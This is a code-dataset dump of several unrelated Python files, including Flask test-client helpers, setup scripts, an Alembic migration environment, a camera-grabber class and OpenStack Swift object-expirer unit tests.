# Remove chunks from the kwds since it wouldn't have the same rank as the
# dataset and can't be used
kwds.pop('chunks', None)
dict2hdfgroup(metadata_dict, mapped_par, **kwds)
original_par = group.create_group(original_metadata)
dict2hdfgroup(signal.original_metadata.as_dictionary(), original_par,
**kwds)
learning_results = group.create_group('learning_results')
dict2hdfgroup(signal.learning_results.__dict__,
learning_results, **kwds)
if hasattr(signal, 'peak_learning_results'):
peak_learning_results = group.create_group(
'peak_learning_results')
dict2hdfgroup(signal.peak_learning_results.__dict__,
peak_learning_results, **kwds)
if len(signal.models):
model_group = group.file.require_group('Analysis/models')
dict2hdfgroup(signal.models._models.as_dictionary(),
model_group, **kwds)
for model in model_group.values():
model.attrs['_signal'] = group.name
def file_writer(filename, signal, *args, **kwds):
"""Writes data to hyperspy's hdf5 format
Parameters
----------
filename: str
signal: a BaseSignal instance
*args, optional
**kwds, optional
"""
with h5py.File(filename, mode='w') as f:
f.attrs['file_format'] = "HyperSpy"
f.attrs['file_format_version'] = version
exps = f.create_group('Experiments')
group_name = signal.metadata.General.title if \
signal.metadata.General.title else '__unnamed__'
# / is an invalid character, see #942
if "/" in group_name:
group_name = group_name.replace("/", "-")
expg = exps.create_group(group_name)
# Add record_by metadata for backward compatibility
smd = signal.metadata.Signal
if signal.axes_manager.signal_dimension == 1:
smd.record_by = "spectrum"
elif signal.axes_manager.signal_dimension == 2:
smd.record_by = "image"
else:
smd.record_by = ""
try:
write_signal(signal, expg, **kwds)
except BaseException:
raise
finally:
del smd.record_by
| gpl-3.0 | -2,065,360,871,214,329,600 | 38.645885 | 82 | 0.541169 | false |
tristanfisher/flask | flask/testing.py | 1 | 6608 | # -*- coding: utf-8 -*-
"""
flask.testing
~~~~~~~~~~~~~
Implements test support helpers. This module is lazily imported
and usually not used in production environments.
:copyright: (c) 2015 by Armin Ronacher.
:license: BSD, see LICENSE for more details.
"""
import werkzeug
from contextlib import contextmanager
from werkzeug.test import Client, EnvironBuilder
from flask import _request_ctx_stack
from flask.json import dumps as json_dumps
try:
from werkzeug.urls import url_parse
except ImportError:
from urlparse import urlsplit as url_parse
def make_test_environ_builder(
app, path='/', base_url=None, subdomain=None, url_scheme=None,
*args, **kwargs
):
"""Creates a new test builder with some application defaults thrown in."""
assert (
not (base_url or subdomain or url_scheme)
or (base_url is not None) != bool(subdomain or url_scheme)
), 'Cannot pass "subdomain" or "url_scheme" with "base_url".'
if base_url is None:
http_host = app.config.get('SERVER_NAME') or 'localhost'
app_root = app.config['APPLICATION_ROOT']
if subdomain:
http_host = '{0}.{1}'.format(subdomain, http_host)
if url_scheme is None:
url_scheme = app.config['PREFERRED_URL_SCHEME']
url = url_parse(path)
base_url = '{0}://{1}/{2}'.format(
url_scheme, url.netloc or http_host, app_root.lstrip('/')
)
path = url.path
if url.query:
sep = b'?' if isinstance(url.query, bytes) else '?'
path += sep + url.query
if 'json' in kwargs:
assert 'data' not in kwargs, (
"Client cannot provide both 'json' and 'data'."
)
# push a context so flask.json can use app's json attributes
with app.app_context():
kwargs['data'] = json_dumps(kwargs.pop('json'))
if 'content_type' not in kwargs:
kwargs['content_type'] = 'application/json'
return EnvironBuilder(path, base_url, *args, **kwargs)
class FlaskClient(Client):
"""Works like a regular Werkzeug test client but has some knowledge about
how Flask works to defer the cleanup of the request context stack to the
end of a ``with`` body when used in a ``with`` statement. For general
information about how to use this class refer to
:class:`werkzeug.test.Client`.
.. versionchanged:: 0.12
`app.test_client()` includes preset default environment, which can be
set after instantiation of the `app.test_client()` object in
`client.environ_base`.
Basic usage is outlined in the :ref:`testing` chapter.
"""
preserve_context = False
def __init__(self, *args, **kwargs):
super(FlaskClient, self).__init__(*args, **kwargs)
self.environ_base = {
"REMOTE_ADDR": "127.0.0.1",
"HTTP_USER_AGENT": "werkzeug/" + werkzeug.__version__
}
@contextmanager
def session_transaction(self, *args, **kwargs):
"""When used in combination with a ``with`` statement this opens a
session transaction. This can be used to modify the session that
the test client uses. Once the ``with`` block is left the session is
stored back.
::
with client.session_transaction() as session:
session['value'] = 42
Internally this is implemented by going through a temporary test
request context and since session handling could depend on
request variables this function accepts the same arguments as
:meth:`~flask.Flask.test_request_context` which are directly
passed through.
"""
if self.cookie_jar is None:
raise RuntimeError('Session transactions only make sense '
'with cookies enabled.')
app = self.application
environ_overrides = kwargs.setdefault('environ_overrides', {})
self.cookie_jar.inject_wsgi(environ_overrides)
outer_reqctx = _request_ctx_stack.top
with app.test_request_context(*args, **kwargs) as c:
session_interface = app.session_interface
sess = session_interface.open_session(app, c.request)
if sess is None:
raise RuntimeError('Session backend did not open a session. '
'Check the configuration')
# Since we have to open a new request context for the session
# handling we want to make sure that we hide our own context
# from the caller. By pushing the original request context
# (or None) on top of this and popping it we get exactly that
# behavior. It's important to not use the push and pop
# methods of the actual request context object since that would
# mean that cleanup handlers are called
_request_ctx_stack.push(outer_reqctx)
try:
yield sess
finally:
_request_ctx_stack.pop()
resp = app.response_class()
if not session_interface.is_null_session(sess):
session_interface.save_session(app, sess, resp)
headers = resp.get_wsgi_headers(c.request.environ)
self.cookie_jar.extract_wsgi(c.request.environ, headers)
def open(self, *args, **kwargs):
kwargs.setdefault('environ_overrides', {}) \
['flask._preserve_context'] = self.preserve_context
kwargs.setdefault('environ_base', self.environ_base)
as_tuple = kwargs.pop('as_tuple', False)
buffered = kwargs.pop('buffered', False)
follow_redirects = kwargs.pop('follow_redirects', False)
builder = make_test_environ_builder(self.application, *args, **kwargs)
return Client.open(self, builder,
as_tuple=as_tuple,
buffered=buffered,
follow_redirects=follow_redirects)
def __enter__(self):
if self.preserve_context:
raise RuntimeError('Cannot nest client invocations')
self.preserve_context = True
return self
def __exit__(self, exc_type, exc_value, tb):
self.preserve_context = False
# on exit we want to clean up earlier. Normally the request context
# stays preserved until the next request in the same thread comes
# in. See RequestGlobals.push() for the general behavior.
top = _request_ctx_stack.top
if top is not None and top.preserved:
top.pop()
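# Minimal usage sketch (illustrative only, not part of the original module).
# ``app`` is assumed to be a configured :class:`flask.Flask` application with
# a SECRET_KEY set so that sessions can be stored; the helper name is
# hypothetical.
def _example_test_client(app):
    client = app.test_client()
    # The ``json`` keyword is serialized by ``make_test_environ_builder`` and
    # sent with a ``Content-Type`` of ``application/json``.
    response = client.post('/api/echo', json={'value': 42})
    # Session contents can be prepared or inspected between requests.
    with client.session_transaction() as session:
        session['user_id'] = 1
    return response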
| bsd-3-clause | -7,685,442,334,930,626,000 | 36.76 | 78 | 0.611834 | false |
StartTheShift/thunderdome-logging | setup.py | 1 | 1329 | import sys
from setuptools import setup, find_packages
#next time:
#python setup.py register
#python setup.py sdist upload
version = open('thunderdome_logging/VERSION', 'r').readline().strip()
long_desc = """
Extension for thunderdome which allows error logging in the graph.
"""
setup(
name='thunderdome-logging',
version=version,
description='Thunderdome graph error logging',
dependency_links=['https://github.com/StartTheShift/thunderdome-logging/archive/{0}.tar.gz#egg=thunderdome-logging-{0}'.format(version)],
long_description=long_desc,
classifiers=[
"Development Status :: 3 - Alpha",
"Environment :: Web Environment",
"Environment :: Plugins",
"License :: OSI Approved :: BSD License",
"Operating System :: OS Independent",
"Programming Language :: Python :: 2.6",
"Programming Language :: Python :: 2.7",
"Topic :: Internet :: WWW/HTTP",
"Topic :: Software Development :: Libraries :: Python Modules",
],
keywords='cassandra,titan,ogm,thunderdome,logging',
install_requires=['thunderdome==0.4.3'],
author='StartTheShift',
author_email='[email protected]',
url='https://github.com/StartTheShift/thunderdome-logging',
license='BSD',
packages=find_packages(),
include_package_data=True,
)
| mit | 7,834,285,208,966,804,000 | 33.076923 | 141 | 0.669676 | false |
cubicdaiya/python-q4m | python_q4m/__init__.py | 1 | 1380 | # -*- coding: utf-8 -*-
import python_q4m
__author__ = "Tatsuhiko Kubo ([email protected])"
__version__ = "0.0.6"
__license__ = "GPL2"
__doc__ = """
This module is a simple Q4M operation wrapper developed by pixiv Inc. for an asynchronous upload system.
A simple example of usage follows:
>>> from python_q4m.q4m import *
>>> class QueueTable(Q4M):
>>> def __init__(self, con):
>>> super(self.__class__, self).__init__(con)
>>> self.table = 'queue_table'
>>> self.columns = ['id',
>>> 'msg',
>>> ]
>>> try:
>>> con = MySQLdb.connect(host='localhost',
>>> db=dbname,
>>> user=username,
>>> passwd=password,
>>> )
>>> q = QueueTable(con)
>>> q.enqueue([1, 'msg'])
>>> while q.wait() == 0:
>>> time.sleep(1);
>>> res = q.dequeue()
>>> print res['id']
>>> print res['msg']
>>> q.end()
>>> con.close()
>>> except MySQLdb.Error, e:
>>> print 'Error %d: %s' % (e.args[0], e.args[1])
>>> q.abort()
>>> con.close()
And it is necessary to create the following table for the above example.
CREATE TABLE `queue_table` (`id` int(11) NOT NULL, `msg` text NOT NULL) ENGINE=QUEUE;
"""
| gpl-2.0 | 372,192,313,206,318,800 | 30.363636 | 98 | 0.465942 | false |
gthank/pytips | alembic/env.py | 1 | 2550 | from __future__ import with_statement
from alembic import context
from sqlalchemy import engine_from_config, pool
from logging.config import fileConfig
# this is the Alembic Config object, which provides
# access to the values within the .ini file in use.
config = context.config
# Interpret the config file for Python logging.
# This line sets up loggers basically.
fileConfig(config.config_file_name)
# add your model's MetaData object here
# for 'autogenerate' support
from pytips import app
cur_db_uri = config.get_section_option('alembic', 'sqlalchemy.url')
my_db_uri = app.config.get('SQLALCHEMY_DATABASE_URI', cur_db_uri)
config.set_section_option('alembic', 'sqlalchemy.url', my_db_uri)
# This next line will cause my model definitions to fire, which is what sets up
# the metadata we're about to hand to Alembic.
from pytips import models
# OK, the previous line initialized the metadata in the db.Model object, so now
# we import db so we can get it and give it to Alembic.
from pytips import db
target_metadata = db.Model.metadata
# other values from the config, defined by the needs of env.py,
# can be acquired:
# my_important_option = config.get_main_option("my_important_option")
# ... etc.
def run_migrations_offline():
"""Run migrations in 'offline' mode.
This configures the context with just a URL
and not an Engine, though an Engine is acceptable
here as well. By skipping the Engine creation
we don't even need a DBAPI to be available.
Calls to context.execute() here emit the given string to the
script output.
"""
url = config.get_main_option("sqlalchemy.url")
context.configure(url=url)
with context.begin_transaction():
context.run_migrations()
def run_migrations_online():
"""Run migrations in 'online' mode.
In this scenario we need to create an Engine
and associate a connection with the context.
"""
engine = engine_from_config(
config.get_section(config.config_ini_section),
prefix='sqlalchemy.',
poolclass=pool.NullPool)
# I need to reuse the connection the ORM is using.
connection = models.Tip.query.session.connection()
context.configure(
connection=connection,
target_metadata=target_metadata
)
try:
with context.begin_transaction():
context.run_migrations()
finally:
connection.close()
if context.is_offline_mode():
run_migrations_offline()
else:
run_migrations_online()
| isc | -8,752,441,984,729,038,000 | 30.097561 | 79 | 0.698824 | false |
semeniuta/FlexVi | flexvi/daq/aravisgrabber.py | 1 | 1399 | from enum import Enum
from gi.repository import Aravis as ar
import aravis as pyar
class AravisEnv:
def __init__(self):
''' Get device IDs and initialize Camera objects '''
ar.update_device_list()
self.device_ids = pyar.get_device_ids()
self.cameras = {i: pyar.Camera(i) for i in self.device_ids}
class AravisGrabber:
States = Enum('States', 'not_initialized not_functional initialized camera_selected')
current_state = States.not_initialized
current_camera = None
def __init__(self, env):
self.env = env
def select_camera_by_id(self, camera_id):
if camera_id not in self.env.device_ids:
raise Exception('Incorrect device id provided')
self.current_camera = self.env.cameras[camera_id]
self.current_state = self.States.camera_selected
def select_camera_by_index(self, idx):
if idx < 0 or idx > len(self.env.device_ids):
raise Exception('Incorrect device index provided')
self.current_camera = self.env.cameras[self.env.device_ids[idx]]
self.current_state = self.States.camera_selected
def grab_image(self):
print 'Grabbing...'
if self.current_state is not self.States.camera_selected:
raise Exception('No camera has been selected')
im = pyar.get_frame(self.current_camera)
return im
| gpl-2.0 | -4,096,126,815,948,293,000 | 35.815789 | 89 | 0.643317 | false |
eliostvs/tomate-exec-plugin | setup.py | 1 | 1335 | #!/bin/env python
import os
from setuptools import setup
def find_xdg_data_files(syspath, relativepath, pkgname, data_files=[]):
for (dirname, _, filenames) in os.walk(relativepath):
if filenames:
syspath = syspath.format(pkgname=pkgname)
subpath = dirname.split(relativepath)[1]
if subpath.startswith("/"):
subpath = subpath[1:]
files = [os.path.join(dirname, f) for f in filenames]
data_files.append((os.path.join(syspath, subpath), files))
return data_files
def find_data_files(data_map, pkgname):
data_files = []
for (syspath, relativepath) in data_map:
find_xdg_data_files(syspath, relativepath, pkgname, data_files)
return data_files
DATA_FILES = [
("share/{pkgname}/plugins", "data/plugins"),
]
setup(
author="Elio Esteves Duarte",
author_email="[email protected]",
description="Tomate plugin that executes commands when the timer starts, stops or finish",
include_package_data=True,
keywords="pomodoro,tomate",
license="GPL-3",
long_description=open("README.md").read(),
name="tomate-exec-plugin",
data_files=find_data_files(DATA_FILES, "tomate"),
url="https://github.com/eliostvs/tomate-exec-plugin",
version="0.5.0",
zip_safe=False,
)
| gpl-3.0 | -5,612,258,948,244,956,000 | 26.244898 | 94 | 0.64794 | false |
larsbutler/swift | test/unit/obj/test_expirer.py | 1 | 28044 | # Copyright (c) 2011 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from time import time
from unittest import main, TestCase
from test.unit import FakeRing, mocked_http_conn, debug_logger
from copy import deepcopy
from tempfile import mkdtemp
from shutil import rmtree
import mock
import six
from six.moves import urllib
from swift.common import internal_client, utils, swob
from swift.obj import expirer
def not_random():
return 0.5
last_not_sleep = 0
def not_sleep(seconds):
global last_not_sleep
last_not_sleep = seconds
class TestObjectExpirer(TestCase):
maxDiff = None
internal_client = None
def setUp(self):
global not_sleep
self.old_loadapp = internal_client.loadapp
self.old_sleep = internal_client.sleep
internal_client.loadapp = lambda *a, **kw: None
internal_client.sleep = not_sleep
self.rcache = mkdtemp()
self.conf = {'recon_cache_path': self.rcache}
self.logger = debug_logger('test-expirer')
def tearDown(self):
rmtree(self.rcache)
internal_client.sleep = self.old_sleep
internal_client.loadapp = self.old_loadapp
def test_get_process_values_from_kwargs(self):
x = expirer.ObjectExpirer({})
vals = {
'processes': 5,
'process': 1,
}
x.get_process_values(vals)
self.assertEqual(x.processes, 5)
self.assertEqual(x.process, 1)
def test_get_process_values_from_config(self):
vals = {
'processes': 5,
'process': 1,
}
x = expirer.ObjectExpirer(vals)
x.get_process_values({})
self.assertEqual(x.processes, 5)
self.assertEqual(x.process, 1)
def test_get_process_values_negative_process(self):
vals = {
'processes': 5,
'process': -1,
}
# from config
x = expirer.ObjectExpirer(vals)
self.assertRaises(ValueError, x.get_process_values, {})
# from kwargs
x = expirer.ObjectExpirer({})
self.assertRaises(ValueError, x.get_process_values, vals)
def test_get_process_values_negative_processes(self):
vals = {
'processes': -5,
'process': 1,
}
# from config
x = expirer.ObjectExpirer(vals)
self.assertRaises(ValueError, x.get_process_values, {})
# from kwargs
x = expirer.ObjectExpirer({})
self.assertRaises(ValueError, x.get_process_values, vals)
def test_get_process_values_process_greater_than_processes(self):
vals = {
'processes': 5,
'process': 7,
}
# from config
x = expirer.ObjectExpirer(vals)
self.assertRaises(ValueError, x.get_process_values, {})
# from kwargs
x = expirer.ObjectExpirer({})
self.assertRaises(ValueError, x.get_process_values, vals)
def test_init_concurrency_too_small(self):
conf = {
'concurrency': 0,
}
self.assertRaises(ValueError, expirer.ObjectExpirer, conf)
conf = {
'concurrency': -1,
}
self.assertRaises(ValueError, expirer.ObjectExpirer, conf)
def test_process_based_concurrency(self):
class ObjectExpirer(expirer.ObjectExpirer):
def __init__(self, conf):
super(ObjectExpirer, self).__init__(conf)
self.processes = 3
self.deleted_objects = {}
self.obj_containers_in_order = []
def delete_object(self, actual_obj, timestamp, container, obj):
if container not in self.deleted_objects:
self.deleted_objects[container] = set()
self.deleted_objects[container].add(obj)
self.obj_containers_in_order.append(container)
class InternalClient(object):
def __init__(self, containers):
self.containers = containers
def get_account_info(self, *a, **kw):
return len(self.containers.keys()), \
sum([len(self.containers[x]) for x in self.containers])
def iter_containers(self, *a, **kw):
return [{'name': six.text_type(x)}
for x in self.containers.keys()]
def iter_objects(self, account, container):
return [{'name': six.text_type(x)}
for x in self.containers[container]]
def delete_container(*a, **kw):
pass
containers = {
'0': set('1-one 2-two 3-three'.split()),
'1': set('2-two 3-three 4-four'.split()),
'2': set('5-five 6-six'.split()),
'3': set(u'7-seven\u2661'.split()),
}
x = ObjectExpirer(self.conf)
x.swift = InternalClient(containers)
deleted_objects = {}
for i in range(3):
x.process = i
x.run_once()
self.assertNotEqual(deleted_objects, x.deleted_objects)
deleted_objects = deepcopy(x.deleted_objects)
self.assertEqual(containers['3'].pop(),
deleted_objects['3'].pop().decode('utf8'))
self.assertEqual(containers, deleted_objects)
self.assertEqual(len(set(x.obj_containers_in_order[:4])), 4)
def test_delete_object(self):
x = expirer.ObjectExpirer({}, logger=self.logger)
actual_obj = 'actual_obj'
timestamp = int(time())
reclaim_ts = timestamp - x.reclaim_age
container = 'container'
obj = 'obj'
http_exc = {
resp_code:
internal_client.UnexpectedResponse(
str(resp_code), swob.HTTPException(status=resp_code))
for resp_code in {404, 412, 500}
}
exc_other = Exception()
def check_call_to_delete_object(exc, ts, should_pop):
x.logger.clear()
start_reports = x.report_objects
with mock.patch.object(x, 'delete_actual_object',
side_effect=exc) as delete_actual:
with mock.patch.object(x, 'pop_queue') as pop_queue:
x.delete_object(actual_obj, ts, container, obj)
delete_actual.assert_called_once_with(actual_obj, ts)
log_lines = x.logger.get_lines_for_level('error')
if should_pop:
pop_queue.assert_called_once_with(container, obj)
self.assertEqual(start_reports + 1, x.report_objects)
self.assertFalse(log_lines)
else:
self.assertFalse(pop_queue.called)
self.assertEqual(start_reports, x.report_objects)
self.assertEqual(1, len(log_lines))
self.assertIn('Exception while deleting object container obj',
log_lines[0])
# verify pop_queue logic on exceptions
for exc, ts, should_pop in [(None, timestamp, True),
(http_exc[404], timestamp, False),
(http_exc[412], timestamp, False),
(http_exc[500], reclaim_ts, False),
(exc_other, reclaim_ts, False),
(http_exc[404], reclaim_ts, True),
(http_exc[412], reclaim_ts, True)]:
try:
check_call_to_delete_object(exc, ts, should_pop)
except AssertionError as err:
self.fail("Failed on %r at %f: %s" % (exc, ts, err))
def test_report(self):
x = expirer.ObjectExpirer({}, logger=self.logger)
x.report()
self.assertEqual(x.logger.get_lines_for_level('info'), [])
x.logger._clear()
x.report(final=True)
self.assertTrue(
'completed' in str(x.logger.get_lines_for_level('info')))
self.assertTrue(
'so far' not in str(x.logger.get_lines_for_level('info')))
x.logger._clear()
x.report_last_time = time() - x.report_interval
x.report()
self.assertTrue(
'completed' not in str(x.logger.get_lines_for_level('info')))
self.assertTrue(
'so far' in str(x.logger.get_lines_for_level('info')))
def test_run_once_nothing_to_do(self):
x = expirer.ObjectExpirer(self.conf, logger=self.logger)
x.swift = 'throw error because a string does not have needed methods'
x.run_once()
self.assertEqual(x.logger.get_lines_for_level('error'),
["Unhandled exception: "])
log_args, log_kwargs = x.logger.log_dict['error'][0]
self.assertEqual(str(log_kwargs['exc_info'][1]),
"'str' object has no attribute 'get_account_info'")
def test_run_once_calls_report(self):
class InternalClient(object):
def get_account_info(*a, **kw):
return 1, 2
def iter_containers(*a, **kw):
return []
x = expirer.ObjectExpirer(self.conf, logger=self.logger)
x.swift = InternalClient()
x.run_once()
self.assertEqual(
x.logger.get_lines_for_level('info'), [
'Pass beginning; 1 possible containers; 2 possible objects',
'Pass completed in 0s; 0 objects expired',
])
def test_run_once_unicode_problem(self):
class InternalClient(object):
container_ring = FakeRing()
def get_account_info(*a, **kw):
return 1, 2
def iter_containers(*a, **kw):
return [{'name': u'1234'}]
def iter_objects(*a, **kw):
return [{'name': u'1234-troms\xf8'}]
def make_request(*a, **kw):
pass
def delete_container(*a, **kw):
pass
x = expirer.ObjectExpirer(self.conf, logger=self.logger)
x.swift = InternalClient()
requests = []
def capture_requests(ipaddr, port, method, path, *args, **kwargs):
requests.append((method, path))
with mocked_http_conn(
200, 200, 200, give_connect=capture_requests):
x.run_once()
self.assertEqual(len(requests), 3)
def test_container_timestamp_break(self):
class InternalClient(object):
def __init__(self, containers):
self.containers = containers
def get_account_info(*a, **kw):
return 1, 2
def iter_containers(self, *a, **kw):
return self.containers
def iter_objects(*a, **kw):
raise Exception('This should not have been called')
x = expirer.ObjectExpirer(self.conf,
logger=self.logger)
x.swift = InternalClient([{'name': str(int(time() + 86400))}])
x.run_once()
logs = x.logger.all_log_lines()
self.assertEqual(logs['info'], [
'Pass beginning; 1 possible containers; 2 possible objects',
'Pass completed in 0s; 0 objects expired',
])
self.assertTrue('error' not in logs)
# Reverse test to be sure it still would blow up the way expected.
fake_swift = InternalClient([{'name': str(int(time() - 86400))}])
x = expirer.ObjectExpirer(self.conf, logger=self.logger,
swift=fake_swift)
x.run_once()
self.assertEqual(
x.logger.get_lines_for_level('error'), [
'Unhandled exception: '])
log_args, log_kwargs = x.logger.log_dict['error'][-1]
self.assertEqual(str(log_kwargs['exc_info'][1]),
'This should not have been called')
def test_object_timestamp_break(self):
class InternalClient(object):
def __init__(self, containers, objects):
self.containers = containers
self.objects = objects
def get_account_info(*a, **kw):
return 1, 2
def iter_containers(self, *a, **kw):
return self.containers
def delete_container(*a, **kw):
pass
def iter_objects(self, *a, **kw):
return self.objects
def should_not_be_called(*a, **kw):
raise Exception('This should not have been called')
fake_swift = InternalClient(
[{'name': str(int(time() - 86400))}],
[{'name': '%d-actual-obj' % int(time() + 86400)}])
x = expirer.ObjectExpirer(self.conf, logger=self.logger,
swift=fake_swift)
x.run_once()
self.assertTrue('error' not in x.logger.all_log_lines())
self.assertEqual(x.logger.get_lines_for_level('info'), [
'Pass beginning; 1 possible containers; 2 possible objects',
'Pass completed in 0s; 0 objects expired',
])
# Reverse test to be sure it still would blow up the way expected.
ts = int(time() - 86400)
fake_swift = InternalClient(
[{'name': str(int(time() - 86400))}],
[{'name': '%d-actual-obj' % ts}])
x = expirer.ObjectExpirer(self.conf, logger=self.logger,
swift=fake_swift)
x.delete_actual_object = should_not_be_called
x.run_once()
self.assertEqual(
x.logger.get_lines_for_level('error'),
['Exception while deleting object %d %d-actual-obj '
'This should not have been called: ' % (ts, ts)])
def test_failed_delete_keeps_entry(self):
class InternalClient(object):
container_ring = None
def __init__(self, containers, objects):
self.containers = containers
self.objects = objects
def get_account_info(*a, **kw):
return 1, 2
def iter_containers(self, *a, **kw):
return self.containers
def delete_container(*a, **kw):
pass
def iter_objects(self, *a, **kw):
return self.objects
def deliberately_blow_up(actual_obj, timestamp):
raise Exception('failed to delete actual object')
def should_not_get_called(container, obj):
raise Exception('This should not have been called')
ts = int(time() - 86400)
fake_swift = InternalClient(
[{'name': str(int(time() - 86400))}],
[{'name': '%d-actual-obj' % ts}])
x = expirer.ObjectExpirer(self.conf, logger=self.logger,
swift=fake_swift)
x.iter_containers = lambda: [str(int(time() - 86400))]
x.delete_actual_object = deliberately_blow_up
x.pop_queue = should_not_get_called
x.run_once()
error_lines = x.logger.get_lines_for_level('error')
self.assertEqual(
error_lines,
['Exception while deleting object %d %d-actual-obj '
'failed to delete actual object: ' % (ts, ts)])
self.assertEqual(
x.logger.get_lines_for_level('info'), [
'Pass beginning; 1 possible containers; 2 possible objects',
'Pass completed in 0s; 0 objects expired',
])
        # Reverse test to be sure it would still blow up as expected.
ts = int(time() - 86400)
fake_swift = InternalClient(
[{'name': str(int(time() - 86400))}],
[{'name': '%d-actual-obj' % ts}])
self.logger._clear()
x = expirer.ObjectExpirer(self.conf, logger=self.logger,
swift=fake_swift)
x.delete_actual_object = lambda o, t: None
x.pop_queue = should_not_get_called
x.run_once()
self.assertEqual(
self.logger.get_lines_for_level('error'),
['Exception while deleting object %d %d-actual-obj This should '
'not have been called: ' % (ts, ts)])
def test_success_gets_counted(self):
class InternalClient(object):
container_ring = None
def __init__(self, containers, objects):
self.containers = containers
self.objects = objects
def get_account_info(*a, **kw):
return 1, 2
def iter_containers(self, *a, **kw):
return self.containers
def delete_container(*a, **kw):
pass
def delete_object(*a, **kw):
pass
def iter_objects(self, *a, **kw):
return self.objects
fake_swift = InternalClient(
[{'name': str(int(time() - 86400))}],
[{'name': '%d-acc/c/actual-obj' % int(time() - 86400)}])
x = expirer.ObjectExpirer(self.conf, logger=self.logger,
swift=fake_swift)
x.delete_actual_object = lambda o, t: None
x.pop_queue = lambda c, o: None
self.assertEqual(x.report_objects, 0)
with mock.patch('swift.obj.expirer.MAX_OBJECTS_TO_CACHE', 0):
x.run_once()
self.assertEqual(x.report_objects, 1)
self.assertEqual(
x.logger.get_lines_for_level('info'),
['Pass beginning; 1 possible containers; 2 possible objects',
'Pass completed in 0s; 1 objects expired'])
def test_delete_actual_object_does_not_get_unicode(self):
class InternalClient(object):
container_ring = None
def __init__(self, containers, objects):
self.containers = containers
self.objects = objects
def get_account_info(*a, **kw):
return 1, 2
def iter_containers(self, *a, **kw):
return self.containers
def delete_container(*a, **kw):
pass
def delete_object(*a, **kw):
pass
def iter_objects(self, *a, **kw):
return self.objects
got_unicode = [False]
def delete_actual_object_test_for_unicode(actual_obj, timestamp):
if isinstance(actual_obj, six.text_type):
got_unicode[0] = True
fake_swift = InternalClient(
[{'name': str(int(time() - 86400))}],
[{'name': u'%d-actual-obj' % int(time() - 86400)}])
x = expirer.ObjectExpirer(self.conf, logger=self.logger,
swift=fake_swift)
x.delete_actual_object = delete_actual_object_test_for_unicode
x.pop_queue = lambda c, o: None
self.assertEqual(x.report_objects, 0)
x.run_once()
self.assertEqual(x.report_objects, 1)
self.assertEqual(
x.logger.get_lines_for_level('info'), [
'Pass beginning; 1 possible containers; 2 possible objects',
'Pass completed in 0s; 1 objects expired',
])
self.assertFalse(got_unicode[0])
def test_failed_delete_continues_on(self):
class InternalClient(object):
container_ring = None
def __init__(self, containers, objects):
self.containers = containers
self.objects = objects
def get_account_info(*a, **kw):
return 1, 2
def iter_containers(self, *a, **kw):
return self.containers
def delete_container(*a, **kw):
raise Exception('failed to delete container')
def delete_object(*a, **kw):
pass
def iter_objects(self, *a, **kw):
return self.objects
def fail_delete_actual_object(actual_obj, timestamp):
raise Exception('failed to delete actual object')
x = expirer.ObjectExpirer(self.conf, logger=self.logger)
cts = int(time() - 86400)
ots = int(time() - 86400)
containers = [
{'name': str(cts)},
{'name': str(cts + 1)},
]
objects = [
{'name': '%d-actual-obj' % ots},
{'name': '%d-next-obj' % ots}
]
x.swift = InternalClient(containers, objects)
x.delete_actual_object = fail_delete_actual_object
x.run_once()
error_lines = x.logger.get_lines_for_level('error')
self.assertEqual(sorted(error_lines), sorted([
'Exception while deleting object %d %d-actual-obj failed to '
'delete actual object: ' % (cts, ots),
'Exception while deleting object %d %d-next-obj failed to '
'delete actual object: ' % (cts, ots),
'Exception while deleting object %d %d-actual-obj failed to '
'delete actual object: ' % (cts + 1, ots),
'Exception while deleting object %d %d-next-obj failed to '
'delete actual object: ' % (cts + 1, ots),
'Exception while deleting container %d failed to delete '
'container: ' % (cts,),
'Exception while deleting container %d failed to delete '
'container: ' % (cts + 1,)]))
self.assertEqual(x.logger.get_lines_for_level('info'), [
'Pass beginning; 1 possible containers; 2 possible objects',
'Pass completed in 0s; 0 objects expired',
])
def test_run_forever_initial_sleep_random(self):
global last_not_sleep
def raise_system_exit():
raise SystemExit('test_run_forever')
interval = 1234
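        # not_random() and not_sleep() are module-level stubs; the initial sleep
        # should be random() * interval, i.e. 0.5 * interval (asserted below).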
x = expirer.ObjectExpirer({'__file__': 'unit_test',
'interval': interval})
orig_random = expirer.random
orig_sleep = expirer.sleep
try:
expirer.random = not_random
expirer.sleep = not_sleep
x.run_once = raise_system_exit
x.run_forever()
except SystemExit as err:
pass
finally:
expirer.random = orig_random
expirer.sleep = orig_sleep
self.assertEqual(str(err), 'test_run_forever')
self.assertEqual(last_not_sleep, 0.5 * interval)
def test_run_forever_catches_usual_exceptions(self):
raises = [0]
def raise_exceptions():
raises[0] += 1
if raises[0] < 2:
raise Exception('exception %d' % raises[0])
raise SystemExit('exiting exception %d' % raises[0])
x = expirer.ObjectExpirer({}, logger=self.logger)
orig_sleep = expirer.sleep
try:
expirer.sleep = not_sleep
x.run_once = raise_exceptions
x.run_forever()
except SystemExit as err:
pass
finally:
expirer.sleep = orig_sleep
self.assertEqual(str(err), 'exiting exception 2')
self.assertEqual(x.logger.get_lines_for_level('error'),
['Unhandled exception: '])
log_args, log_kwargs = x.logger.log_dict['error'][0]
self.assertEqual(str(log_kwargs['exc_info'][1]),
'exception 1')
def test_delete_actual_object(self):
got_env = [None]
def fake_app(env, start_response):
got_env[0] = env
start_response('204 No Content', [('Content-Length', '0')])
return []
internal_client.loadapp = lambda *a, **kw: fake_app
x = expirer.ObjectExpirer({})
ts = '1234'
x.delete_actual_object('/path/to/object', ts)
self.assertEqual(got_env[0]['HTTP_X_IF_DELETE_AT'], ts)
self.assertEqual(got_env[0]['HTTP_X_TIMESTAMP'],
got_env[0]['HTTP_X_IF_DELETE_AT'])
def test_delete_actual_object_nourlquoting(self):
# delete_actual_object should not do its own url quoting because
# internal client's make_request handles that.
got_env = [None]
def fake_app(env, start_response):
got_env[0] = env
start_response('204 No Content', [('Content-Length', '0')])
return []
internal_client.loadapp = lambda *a, **kw: fake_app
x = expirer.ObjectExpirer({})
ts = '1234'
x.delete_actual_object('/path/to/object name', ts)
self.assertEqual(got_env[0]['HTTP_X_IF_DELETE_AT'], ts)
self.assertEqual(got_env[0]['HTTP_X_TIMESTAMP'],
got_env[0]['HTTP_X_IF_DELETE_AT'])
